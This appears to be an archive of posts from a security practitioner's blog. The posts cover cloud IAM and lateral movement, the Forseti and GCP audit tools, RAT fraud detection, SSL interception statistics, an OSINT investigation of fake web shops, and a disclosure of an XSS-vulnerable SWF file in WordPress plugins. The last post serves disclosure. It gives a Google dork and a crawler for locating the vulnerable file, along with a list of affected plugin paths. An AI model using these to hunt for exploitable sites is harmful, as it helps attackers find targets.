But the rule of thumb is:

Start by looking at what you are using, and keep note of your platform services
Identity and Access Management (IAM) is always on you, on all layers
Keep a reference of the responsibility models handy (like this one!)

Azure Shared Responsibility Model

Microsoft documentation is well written and extensive, dig their docs.

References

AWS Shared Responsibility Model

References

GCP Shared Responsibility Model

Google do not have a go to resource for the shared responsibility model anymore, they redirect you here.

But they have detailed security models for specific services.

References

Conclusion

We tend to give the concept of shared responsibility for granted, in particular if we are used to cloud native environments.

The main issue as I see it is when you grow outside the boundaries of a cloud provider and you have to suddenly face the perils of a multi cloud or hybrid environment.

This is when it’s better to keep an eye on the nuances between provider’s models, in particular on the PaaS layer: there might be some areas that are not overlapping as you are expecting and that can become a blind spot.

Note: I intend to keep this article up to date so it can serve the purpose of having a single reference.

Lateral Movement in the Cloud

Thu, 17 Sep 2020 00:53:55 +0200

In the context of incident response lateral movement is how attackers are able to penetrate deeper inside a system. Understanding this concept is critical to contain an ongoing breach.

The Attack Lifecycle

There are many models that help to understand an attack lifecycle in depth, but from a practical perspective assume all attackers will do the following endlessly: compromise a resource, gain persistence, move laterally.

As a defender you will need to walk forward and backward this cycle to stop the bleeding, and the tricky part is indetifying the entry point: the resource that have been compromised first.

The entry point is the front door you left open. It is usually a resource that is publicly exposed like a virtual machine running a public website.

If you identify a compromised resource that is not publicly exposed, most probably the attacker reached it by moving laterally.

Modelling the movements

Lateral movement happens when the attacker compromise other resources from one which has already been breached.

It is enabled by two factors:

What other resources can be reached from a compromised one
What credentials can be found on compromised resources

These two factors defines the blast radius: the area that an attacker can traverse inside your infrastructure and, as a consequence, the impact of the attack.

The text book example of lateral movement is breaching a website, gain access to the virtual machine running it, finding the credentials to the database in the backend and compromise it.

In the cloud you can model attacker movements on three layers, which are loosely related to the way the cloud stack is segmented (IaaS, PaaS, SaaS):

The network layer.
The Identity & Access Management (IAM) layer.
The application layer.

Network Layer

The network layer is mostly tied to infrastructure services (the “I” in IaaS).

It boils down to a classic network security problem: which cloud services are connected to the same Virtual Private Network (VPC), which firewall rules are in place, etc.

In the worst case a compromised virtual machine’s blast radius is everything attached to the same VPC.

Identity & Access Management Layer

IAM is how access controls is governed in the cloud. It’s about authorising identities to certain actions on specific cloud services.

The concept of identity is fluid between cloud providers but it can be described as the authenticated entity to which authorisation grants are assigned. A user, a group, a service account, a workload.

Because identities can be very different things, and authorisation grants can be very granular, understanding the blast radius becomes complicated quickly.

From the attacker perspective compromising a user or compromising a random cloud service can have the very same impact if they have the same authorisation grants.

Instead from a defender point of view you will hardly be able to apply the same security controls, the same auditing and the same monitoring practices.

In short IAM is the layer where the economics of an attack skews in favour of attackers.

Application Layer

All the secrets and credentials that are bundled in the application layer of a service will also contribute to the blast radius, since they can be used to access and compromise further resources.

Think of passwords to databases, api tokens, credentials to third party services.

Conclusion

Modelling the lateral movements and the blast radius of an attack is an obligatory step for a successful containment of a breach.

An incident resolution will be as effective as how fast we will be able to answer the question: “what services am I running in my infrastructure, and how can I reach them?”

So be prepared: invest in an inventory of running cloud services you can query quickly and map their interconnections on the three different layers.

Stricter Access Control to Google Cloud Registry

Tue, 08 Sep 2020 00:53:55 +0200

Google Cloud Registry (GCR) is the Docker container registry offered by Google Cloud Platform (GCP). Under the hood it’s an interface on top of Google Cloud Storage (GCS), and it’s so thin that access control is entirely delegated to the storage layer.

There are no dedicated roles

In fact, there are no dedicated Identity Access Management (IAM) Roles to govern publishing and retrieval of container images: to push and pull we must use role bindings that will grant write (and read) to the underlying bucket that GCR is using.

According to the docs this bucket is artifacts..appspot.com and the roles to use are roles/storage.admin and roles/storage.objectViewer (but any powerful primitive role such as Owner, Editor and Viewer will do).

The role binding can be applied to the IAM policy of the Project, Folder, Organization or the bucket itself.

What’s the risk

While binding the role on the bucket’s IAM could be fine, binding on an IAM policy higher in the hierarchy will result in a wider authorization grant affecting all buckets in scope.

Such grant could have an impact on your compliance posture. A common example is if one of the buckets contains Personal Identifiable Information (PII) and your organization is subject to GDPR.

IAM is tricky and things get messier when the number of Projects we need to administer increases and there is a business case to give programmatic access to all GCR instances. For example if we have a centralized build system that needs to push container images, or if we need to integrate a third party container scanner.

In such cases, especially when a third party is involved, binding a Service Account with read/write permissions to the GCS layer is unacceptable as it will increase a potential attack’s blast radius.

How to mitigate

While we wait for Google to implement a set of dedicated Roles (see Artifact Registry), there are a couple of solutions we can adopt to minimize the authorization grant.

The first is organizational: minimize the number of GCR instances. Ideally, if you can use a single instance you can bind the Role on the associated bucket’s IAM policy. A small number of instances could be managed that way but I let you decide what small means in your context.

The second solution is technical: leverage IAM Conditions to reduce the scope of the role binding to only the buckets that are used by GCR. IAM Conditions is a feature of Cloud IAM that allows operators to scope down role bindings.

Luckily these buckets have similar names and we can use this pattern to set up a role binding that will be applied only when the bucket’s name match, like this:

{
    "expression": "resource.name.startsWith(\"projects/_/buckets/artifacts\")",
    "title": "GCR buckets only",
    "description": "Reduce the binding scope to affect only buckets used by GCR"
}

This solution is pragmatic and scale well with the number of Projects / Folders affected, as long as there are no other buckets named artifact*.

Keep in mind that you need to use the full bucket identifier in the condition and If GCR is configured to use explicit storage regions, the bucket name will be (eu|us|asia).artifacts..appspot.com.

TR19: Distributed Security Alerting

Mon, 01 Apr 2019 00:00:00 +0000

Video:

Also available here.

Forseti: Stepping Up the Cloud Security Game

Fri, 15 Sep 2017 12:15:09 +0200

Securing our Cloud infrastructure is incredibly important. We are now taking another step forward by leveraging open source tools we developed in partnership with Google.

Spotify engineering teams are fully embracing the devops culture: to increase development speed every dev team is responsible for their operational pipelines. From a security perspective we are continuously striving to bake security into those pipelines by leveraging security automation and self serve security tooling. The industry lingo for this is “SecDevOps”.

The friction to provisioning machines and experiment has been significantly reduced since we made our shift to a cloud infrastructure on the Google Cloud Platform. Dev teams are now able to freely add pieces to our infrastructure seamlessly, but it also introduced complexity from a security perspective since it also made it harder to scale our hardening efforts at the same pace.

For this reason we started building our own tools to audit GCP: the goal was to quickly detect and fix security misconfigurations as they arise.

Running these specialized tools has proven to be a huge step forward, but it also highlighted some non obvious problems on how to properly audit and address issues on a growing infrastructure. It was clear we still lacked precise visibility over our resources and therefore it was very hard to keep an audit trail of changes and additions. We couldn’t look back at what the state of the infrastructure was at a certain point in time, and thus we couldn’t properly investigate in case of incidents.

While detecting misconfigurations was a solved problem, we also discovered that identifying ownership and addressing misconfigured resources was adding too much to the workload for the security team.

Enter Forseti

To address these gaps we asked Google to join forces to step up in our cloud security game. The result of our efforts is Forseti, an open source security-swiss-army-knife for Google Cloud.

Forseti is comprised of different components with specialized use cases. As a first step, the tool takes a snapshot of the current infrastructure by building an inventory of every active resource. Secondly it runs different scanners on the snapshot to highlight security misconfigurations. Every violation discovered will raise an alert.

Finally we can also automatically enforce policies/configurations as soon as an issue is detected. For example in a project IAM policy or in a project firewall configuration any violation will be fixed.

While developing Forseti we deployed it from the start. This helped us refine the scanning rules and identify which resources we needed to inventorize the most.

We’ve now reached a first point of maturity and at the time of writing we are successfully auditing every day:

~ 1300 Projects
~ 5000 GCS Buckets
~ 14000 Compute instances
~ 200 CloudSQL instances
~ 6400 Google Groups
~ 1000 AppEngine instances

(not an exhaustive list of all resource types audited)

The inventory alone is giving us a grand overview of the state of the infrastructure and provides a detailed audit trail we can tap into in case of incidents and internal investigations.

With the current setup we are able to identify many violations on the spot, for example: public GCS buckets, exposed CloudSQL instances, unexpected entries in IAM policies and bogus firewall rules.

By plugging into Forseti’s extensible notification system we are able to automatically deliver alerts directly to the team owning the affected resource alongside with instruction on how to fix the problem, freeing the security team from the burden of manually getting involved.

This new level of automation allows the security team to be involved only when an alert hasn’t been acknowledged or the team affected needs direct support.

There is still lots of room for improvement and while we are already getting a lot of value out of Forseti and we will keep working on it. We would love to see a community grow around the tool: you can read more about Forseti on the Google Cloud Platform blog, on the Forseti web site and join the discussion in the forum and on GitHub!

Google Cloud Security Toolbox

Wed, 22 Feb 2017 12:27:54 +0200

At Spotify, we actively manage more than 800 Google Cloud Platform projects. As such, maintaining a proper security posture at scale has proven to be a challenging task. In an effort to seamlessly audit and strengthen the security stance of our massive cloud infrastructure, we are investing various resources into building our own tools and methodologies.

As a result of these efforts, we are excited to open source two of our internal tools in hopes to benefit the community and to share knowledge.

Both tools are heavily used within Spotify, and we hope other Google Cloud customers find benefit as well. Contributions are enthusiastically welcome!

GCP Audit

Inspired by Scout2, we built a security auditing tool dedicated to the Google Cloud Platform: GCP-Audit.

The tool allows analysts to scan Google Cloud projects to highlight common security issues like inadequate permissions on storage buckets, publicly exposed Compute Engine instances, misconfigured CloudSQL, and more. Issues are defined by an internal rules repository that is designed to be easily expandable.

For example, we believe that in a cloud environment, reducing the number of exposed services is critical to minimize our attack surface and effectively enforce security controls.

Consider the following rule:

{
   “name”: “Traffic allowed from all IP’s to CloudSQL instance”,
   “filters”: [{
       “matchtype”: “exact”,
       “filter”: {
         “settings”:{
           “ipConfiguration”:{
             “authorizedNetworks”:[{
               “value”:“0.0.0.0/0”
             }]
           }
         }
       }
   }]
}

This rule will find CloudSQL instances that are exposed to 0.0.0.0/0. Rule definitions support either JSON or YAML format, and the GCP-Audit engine will apply the filters defined in the rule to Google’s API responses, then check if there are any concerning differences.

Learn more about it on Github

GCP Firewall Enforcer

We’ve found that monitoring firewall rules across multiple networks of cloud services is burdensome: maintaining a consistent firewalling policy between ephemeral services and a sane audit trail spanning through different projects is a task that does not scale easily. To improve the process and automatically increase our cloud security stance, we’ve built GCP-Firewall-Enforcer.

The goal of this tool is continuously enforce an audited set of firewall rules across multiple Google Cloud projects. This way, accidental firewall alterations are promptly detected and automatically fixed.

The approach provides multiple benefits: we can automatically mitigate dangerous firewall issues as they happen, as well as easily monitor and investigate network issues. This enabled our security team to maintain control of firewall policies while allowing for reviews by network specialists.

Advanced Techniques for Detecting RAT Screen Control

Fri, 05 Feb 2016 00:00:00 +0000

RAT WARS 2.0: Advanced Techniques for Detecting RAT Screen Control

In the landscape of web maliciousness Remote Administration Trojans 1 are not a new trend but their usage is still strong and growing steady.

At its core a RAT is a backdoor facility used to let an attacker enter unnoticed into the victim computer to control it remotely: for example most banking trojan nowadays are using remote desktop modules to open a VNC/RDP channel to allow an attacker to exfiltrate the money from within the users browser inside its legit session.

Newer sophisticated malware like Dyre are stepped up the game by completely diverting the user on fake banking portals while keeping the login session alive in the background, and once the user has disclosed the required credentials, the attacker connect to the user machine via a remote desktop channel and perform the wire fraud unnoticed.

RAT Screen Control

The usual attack is comprised by two phases.

The first step is when a Dyre infected user enter the banking website location inside the browser and the request is proxied by the malware to a fake website that is identical to the bank website just after the real login. In the background Dyre keep the real banking session open.

The second phase happens as soon as the attacker receives an automated Jabber notification with user session data and a VNC callback to a protected terminal server. He then starts interacting with the user by sending challenging questions, fake pages and fake login field to the fake browsing session to the user. The user start answering the attackers forms providing needed information while the attacker starts a screen control session towards the user PC to use the real user session to perform the wire fraud.

This is why this kind of attack it is so hard to detect: for the most part the attack killchain 2 is happening out of reach from the bank’s anti fraud capabilities. The only exception is the final exfiltration phase when the only thing left is the chance to detect the attacker session, but even then the attacker is coming from within the legit user session making things harder.

These inner weaknesses of classic agentless fraud detection techniques are the reason behind the increase of popularity and sophistication of this kind of attacks.

Since what agentless fraud detections can do is to detect infected users or detect the attacker session by diverting users to web fakes and masquerading the attacker session there is a high chance to nullify the whole detection.

Then how can a bank portal understand what’s going on if what they see is a session initiated from the usual user’s ip address, from the usual user’s browser fingerprint, without any kind of webinject/AST or other common indicators of compromise?

Advanced RAT detection techniques

To respond to this new kind of fraud Minded Security has started to research viable detection techniques and implemented a new solution based on Telemetry Modeling.

This is a short description of the viable detection techniques: Desktop Properties Detection, Detection of Velocity Pings or Session Keepalives, Telemetry Modeling of User Biometrics, Telemetry Modeling of Protocols and IOC Detection.

Desktop Properties Detection

This is the most basic detection whose point is to detect anomalies in the properties of the browser/desktop used: for example older RDP protocols might alter the color depth, or hidden VNC session may have unusual desktop resolutions.

Those indicators can be tracked and then correlated to build a detection.

Detection of Velocity Pings or Session Keepalives

While waiting for the user to disclose his PIN/OTP the attacker must keep the user session alive if he want to use it later to perform a wire transfer. This is what “velocity pings” are for: periodic faster HTTP requests whose goal is to keep the session alive.

The requests cadence, their content can be used to build an indicator of compromise and trigger a detection.

Telemetry Modeling of User Biometrics

The point of this approach is to track the user telemetry (keyboard usage, mouse movements, input gestures) to build a model of the user. Once the model is built it is used as yardstick in an anomaly detection context: the output provided give an insight if the current session is being used by the usual users.

Unfortunately while this information is indeed useful, the weaknesses are manifold.

First the infrastructure needed is far from lightweight: it needs to store big data for the user models and has to run complex machine learning algorithms nearly real time to perform the anomaly detection. This means a complex and expensive infrastructure.

Secondly the detection is fooled in the corner case of a single machine shared by different people, think of a corporate environment [3].

Telemetry Modeling of Protocols

This detection is one of the most advanced and relies on tracking glitches and anomalies in how the user’s telemetry is transmitted by the desktop remote protocol.

For example if there is a remote desktop in place, the telemetry data is compressed and passed trough by the remote desktop protocol itself or if the user is browsing the bank page trough a virtual machine, the input is filtered by the VM layer. All these added software layers operates to synchronize between the input received and the input reproduced adding glitches that could be tracked as anomalies.

This let to have a very light engine that is able to lively catch latency generated by user interface flowing through filter-driver chains. Typically VM guest environments and remote control tools install additional layered interfaces to replicate cursor positions and this creates latency patterns we can detect.

Once these anomalies are collected they are used to understand in real time if there is a remote connection in place. We provide this detection approach in our anti fraud suite AMT - RATDET Module.

IOC Detection

A malware infection can alter the profile of the user’s machine/browser and these alterations could be tracked and used as indicators of compromise to flag the user as a potential victim of fraud.

Or it could be possible to check the existence of certain files on the user file system, like suspicious executables, hidden vnc servers and others that can be used as an evidence of infection.

These indicators vary from malware to malware but are indeed very useful to prevent a fraud in the early stage of the killchain, as soon the user is infected and before the exfiltration is put in place.

Conclusion

In this rat-race against financial malware there is not a de facto detection to be used: malware are constantly evolving and so should our defense techniques.

In our opinion the recipe to a successful anti fraud monitoring lies into having a flexible and modular approach: mixing different detection techniques to build an unified risk model of the users.

References

[3]: A provider for this kind of solution is BioCatch.

Beyond Superfish: a Journey on SSL MitM in the Wild

Thu, 09 Apr 2015 00:00:00 +0000

Beyond Superfish: a Journey on SSL MitM in the Wild

Recently Lenovo hit the news because they got caught installing adware on their laptops, namely Superfish, which, amongst other features, also perform SSL Mitm on the infected computer.

Unfortunately, Superfish is not the only one that has been caught nullifying end-to-end SSL encryption. Many other software and services are turning this “feature” into a nightmare: result is that nowadays SSL Man in the Middle is not an uncommon scenario at all.

But how widespread is it?

Thanks to Minded Security AMT Technology we are able to provide some insights since we monitor this kind of threat, being quite common to banking malware too: an example is Hesperbot that deploys an intercepting proxy on localhost to provide fake SSL certificates to its victims.

What we do is to analyse our client’s users security stance to understand if they accept invalid certificates from external sources.

On any given day we can correlate unique users plagued by SSL MiTM to the presence of different adwares, not only SuperFish:

Superfish: 8.36%
iMonomy: 5.35%
JollyWallet: 4.01%
FirstOffer: 2.00%
DealPly: 0.33%
InterYield: 0.32%
jmp9: 0.30%

Those numbers are daily averages collected from a sample of two weeks traffic from over 1 year of logs. The following graph shows how a total of ~20% of Mitm’d users is correlated to an adware infection:

But there’s more than just malwares when dealing with SSL interception. Many legitimate services underestimates this risk and accept it as a tradeoff for various gains.

That’s the case of “cloud accelerated” browsers where users requests are cached on the cloud to provide a performance boost, like some versions of Opera Mini, Maxthon or Puffin that are not so uncommon and together are accounting for a 31.02% of total positive users we monitored.

On the Puffin Faqs we can read:

“All traffic from Puffin app to Puffin server are encrypted. It is safe to use public non-secure WiFi through Puffin, but not safe at all for most browsers.”

Which highlights that the cloud server is used as a proxy, thus sending requests on behalf of the users.

It’s not so clear instead for Maxthon. After the Superfish fiasco they published a note stating that even if yes, Maxthon users where positive to SSL MitM test, they were nonetheless secure:

“[…] Due to the way we handle javascript requests in our browser, Maxthon’s PC browser unintentionally triggers a false positive on the Superfish test. In most cases running the test on other browsers on your system will not. If you find yourself in a position where Maxthon is said to be insecure and Chrome (on the same machine) is not, do not worry. If you get positives from all browsers, you likely have Superfish.

To repeat: the way Maxthon browsers retrieve javascript can trigger a false positive during a Superfish detection test saying your system is at risk. Even though our browsers remain as secure as the best in the industry, we recognize the severity of this bug and have elevated it to the top of the line – P1 importance.”

According to our tests, Maxthon’s Windows client application ignores SSL certificates on remote JavaScripts resources and AJAX requests. Fortunately, the annoying behaviour has been apparently fixed on v4.4.4.3000.

The idea to increase performance by caching or inspect the content of the data in transit is not used exclusively by cloud browsers.

In fact, we discovered some users using legitimate services like VPNs and triggering SSL Mitm alerts on our systems. For example:

HotSpot Shield: 0.07%
SpotFlux VPN: 0.02%
XO Cloud Services: 0.51%
WebSense Cloud Security: 0.03%

have an high correlation ratio.

From the SpotFlux website we read:

“Mobile data compression helps you save on bandwidth bills”

The following graph shows the percentage of services against the total of SSL Mitm’d users we monitored:

The classic SSL model is meant to protect communications end-to-end, but if user’s connection is initiated or intercepted by the cloud service provider the purpose of this model falls short because the security of the SSL model depends on how the encryption keys are exchanged.

Lastly we observed a plethora of private networks like hotels, public hotspots, small companies that have an high correlation ratio but of which we couldn’t identify a common cause other than a misconfiguration.

Conclusion

To sum it up SSL Mitm is a real common scenario with very different causes and broad consequences. We advise to be very wary of the software you are using on your devices since, as we’ve shown, even legitimate services and apps can pose a threat to your security profile.

FakeCommerce, an exercise in OSINT

Sat, 28 Feb 2015 00:00:00 +0000

I’ve been contacted by a friend seeking for help: he bought something on a random ecommerce and after 30 days nothing was shipped and no one was replying to his emails. He wanted to know if he had been scammed.

In the end the item arrived and the ecommerce proven to be somehow legit and the FakeCommerce label might be a bit sensationalistc. Anyhow the quick investigation I performed was a good OSINT exercise worth a share.

The website was pietraneraetna.it.

That was the email he received to confirm his purchase:

Da: [email protected] invio:domenica 18 gennaio 2015 13:20:22A:XXXX=
[email protected] [email protected]:You have transferred 91.41 EUR to=
 pietraneraetna.it.--------------------------------------------------------=
-----------------------------------------------------------The order detail=
s are as follows:----------------------------------------------------------=
---------------------------------------------------------Order No.: XXXX-mm=
XXXXss-hpdXXXXSeller website: pietraneraetna.itPayment Date&Time: 2015-01-1=
8 20:20Amount: 91.41 EURPayment No.: HPV15011820154XXXXXXDue to the foreign =
exchange rate=2C the amount displayed on your statement might be a little b=
it different from the real price.You can also check your order status and c=
onfirm the merchandise delivery on our bill support webiste ofPlease note "=
BUTTER UILF" will be displayed on your credit card statement instead of the=
 website from which you purchased the mentioned product.It's just used for =
sending bill statement by the seller's payment processor as a tool.--------=
---------------------------------------------------------------------------=
--------------------------------Should you need any further assistance=2C p=
lease don't hesitate to contact our Customer Services department at service=
@winwservice.comwith the transaction details listed above or visit our bill=
 support webiste of The order on the help site of random codes are 99495512=
62.Tel: +86-0755-83268282Fax: +86-0755-83268282E-mail: service@winwservice.=
com------------------------------------------------------------------------=
-------------------------------------------If you have any question=2C plea=
se don't hesitate to contact us!                      =

Some interesting pieces:

Please note "BUTTER UILF" will be displayed on your credit card statement instead of the website from which you purchased the mentioned product.It's just used for sending bill statement by the seller's payment processor as a tool.

A quick search on BUTTER UILD revealed nothing. But in the email there were some contact details:

Tel: +86-0755-83268282
Fax: +86-0755-83268282
E-mail: [email protected]

So +86 is China country calling code, and 0755 is the Shenzhen prefix. While the site is advertised as a local italian shop looks like it’s chinese instead. The copy on the pages have also very likely been machine translated.

The domain winwservice.com is registered by HICHINA ZHICHENG TECHNOLOGY LTD. There is no website attached. A quick search reveals some ripoff reports:

Ordered designer bag from an outlet store on line saying it was in Atlanta, Ga
after giving my credit card payment,received email,Order paid successfully.Order transfered to  1465.49CNY to  wonderchinagoods.com
then goes on to say,due to foreign exchange rate,amount displayed on my credit card,might be different from real price.
said please note"SZ PL CO.LTD" will be displayed on credit card instead of websit you ordered from and that the method is used for sending bill statement by the sellers payment processor as a tool.
this was not displayed on the initial Web site I ordered from, the site had designers Name @ logo, looked very official, and was close to where I reside.
i have replied several time to cancel this order,with no response.,I was going to try get explanation,but with no response, I now have to go through all the inconvenience of reporting it to my credit card company.
this should be illegal and considered fraud.

Back to pietraneraetna.it. The website looks extremely shady and is very similar to the one described on the ripoff report: it is a single brand shop where products are heavily discounted, the copy is badly translated and, even worse, it processes credit cards directly.

A whois reveals that the domain is registered by Mr Xiao Xiaoli. On the same ip 31.222.203.13 there are 13 other sites, many of which resemble a lot the current ecommerce template: single brand, bad copy, heavy discount, direct credit card processing, you get the picture.

The list:

anaxo.at
archienadon.ca
congresslink.it
gfzone.it
jackorbarn.se
kerviaggi.it
ludix.be
mailserviceijlst.nl
pandoraringsuk.eu
pietraneraetna.it
sindacatosociologi.it
summerschoolcomo.it
ugg-oultet.nl
vitagua.nl

Most TLDs are european, one canadian. This is interesting and rise the suspect there could be a network of this kind of ecommerces spanning trough europe. The registrant names yelds nothing useful: different common names, lot of false positive.

Insted the ip reveals an interesting ASN: AS12327 IDEAR4BUSINESS-INTERNATIONAL-LTD idear4business international LTD (registered Mar 30, 2011).

Let’s find the associated ip blocks:

whois -h whois.radb.net -- '-i origin AS12327' | grep -Eo "([0-9.]+){4}/[0-9]+

The resulting subnets:

195.191.102.0/23
31.222.200.0/21
37.148.216.0/21
195.191.102.0/23
37.148.218.0/23
37.148.218.0/23
31.222.200.0/21
31.222.200.0/21
37.148.220.0/22
37.148.220.0/22

A quick manual investigation on the ips revealed some more similar ecommerce sites. DomainTools’s IP Explorer has proven to be extremely useful to quickly find populated D blocks.

Next step was to perform a mass reverse ip lookup on those subnets.

Then I did compare the front page of already known fake ecommerces to derive a common pattern, on top of which I started scraping the whole domain list with the help of some curl and grep fu. It took a lot of time.

The pattern was far from perfect (and the scraping is incomplete) but gave an astounding list of over 1000 matches. I suspect there might be some more. The list is here for your delight, with some false positives. Here is an excerpt:

3dblaupause.de
abercrombie-zweibrucken.com
adrianhoffmann.de
airjordansadle.it
airmaxnetherlands.com
alansvoyant.fr
…
www.nikeblazerfemmelb.com
www.nikedunksforsales.com
www.nikefactory.us
www.nikefree30pinkde.de

Most domains are brand related, some others are obviously totally unlinked and might be recently expired domains mass purchased to gain from their previous seo reputation. The whole network deploy scheme looks totally automatized and many sites share the same product catalog.

In the end I can’t say if this chinese ecommerce network, while looking shady, is a total scam because my friend received his purchase. Anyhow I still advised him to block the credit card used.

WordCamp Italy 2013: Lo Stato della Sicurezza nell'Ecosistema di Wordpress

Tue, 19 Mar 2013 00:00:00 +0000

Video:

Also available on WordPress.tv.

Slides: Available on SlideShare

Vulnerable SWF Bundled in 40 Wordpress Plugins

Thu, 22 Nov 2012 00:00:00 +0000

As stated on this announcement on Full Disclosure every major old versions of Wordpress (from 2.5 to 3.3.1) was bundling a SWF applet named swfupload.swf which is vulnerable to XSS. The original hole was found by Neal Poole.

Together with Ryan we investigated a little on this issue and after perfoming a quick dork on google he noticed that a few Wordpress plugins were bundling the very same vulnerable applet.

To spot all the affected plugins I wrote a quick crawl and ran it against the public Wordpress SVN plugin repository and, without much surprise, we discovered a total of 40 plugins which included the vulnerable swf:

http://plugins.svn.wordpress.org/wysija-newsletters/trunk/js/jquery/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/wp-yasslideshow/trunk/js/swfupload/js/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/wp-vertical-gallery/trunk/js/swfupload/js/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/wp-superb-slideshow/trunk/js/swfupload/js/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/wp-royal-gallery/trunk/js/swfupload/js/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/wp-powerplaygallery/trunk/js/swfupload/js/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/wp-matrix-gallery/trunk/js/swfupload/js/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/wp-levoslideshow/trunk/js/swfupload/js/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/wp-image-news-slider/trunk/js/swfupload/js/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/wp-homepage-slideshow/trunk/js/swfupload/js/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/wp-flipslideshow/trunk/js/swfupload/js/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/wp-extended/trunk/js/swfupload/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/wp-ecommerce-cvs-importer/trunk/upload/js/swfupload/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/wp-dreamworkgallery/trunk/js/swfupload/js/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/wp-carouselslideshow/trunk/js/swfupload/js/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/wp-bliss-gallery/trunk/js/swfupload/js/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/wp-3dflick-slideshow/trunk/js/swfupload/js/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/wp-3dbanner-rotator/trunk/js/swfupload/js/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/ultimate-tinymce/trunk/addons/images/js/swfupload/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/sprapid/trunk/swfupload/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/spotlightyour/trunk/library/js/swfupload/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/smart-slide-show/trunk/js/swfupload/js/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/slide-show-pro/trunk/js/swfupload/js/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/power-zoomer/trunk/js/swfupload/js/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/pica-photo-gallery/trunk/js/swfupload/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/pdw-file-browser/trunk/pdw_file_browser/swfupload/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/nextgen-gallery/trunk/admin/js/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/mac-dock-gallery/trunk/js/swfupload/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/mac-dock-photogallery/trunk/js/swfupload/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/fresh-page/trunk/thirdparty/swfupload/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/fluid-accessible-ui-options/trunk/infusion/lib/swfupload/flash/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/fluid-accessible-uploader/trunk/infusion/lib/swfupload/flash/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/fluid-accessible-pager/trunk/infusion/lib/swfupload/flash/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/fluid-accessible-rich-inline-edit/trunk/infusion/lib/swfupload/flash/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/flash-album-gallery/trunk/admin/js/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/dm-albums/trunk/flash/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/comment-extra-field/trunk/scripts/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/blaze-slide-show-for-wordpress/trunk/js/swfupload/js/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/apptha-slider-gallery/trunk/js/swfupload/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/apptha-banner/trunk/js/swfupload/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12

The affected plugins were promptly disclosed to the Wordpress development team and are now included in WPScan’s database.

On a sidenote we’ve scanned the themes in the public directory as well but we didn’t find anything. On the other hand after a little google-fu we found out that some commercial themes are bundling swfupload.

We didn’t investigate further on those, but here is the dork:

inurl:wp-content/themes inurl:swfupload.swf

Let us know if you find something!

Finally here is the crawler I wrote. It’s based on scrapy (which is awesome) and it’s simple enough to be customized without much effort:

from scrapy.contrib.spiders import CrawlSpider, Rule
from scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor
from scrapy.item import Item, Field


class SWFfound(Item):
    url = Field()


class Yummy(CrawlSpider):
    name = 'swfupload_test'
    allowed_domains = ['themes.svn.wordpress.org']
    start_urls = ['http://themes.svn.wordpress.org/']

    rules = (
            Rule(SgmlLinkExtractor(deny=('.*assets/', '.*branches/', '.*tags/'))),
            Rule(SgmlLinkExtractor(allow=('swfupload\.swf',), deny_extensions=('php', 'jpg', 'jpeg', 'gif', 'png', 'htm', 'html')), callback='parse_item'),
    )

    def parse_item(self, response):
        self.log('Found:\t%s' % response.url)
        item = SWFfound()
        item['url'] = str(response.url)
        return item


SPIDER = Yummy()

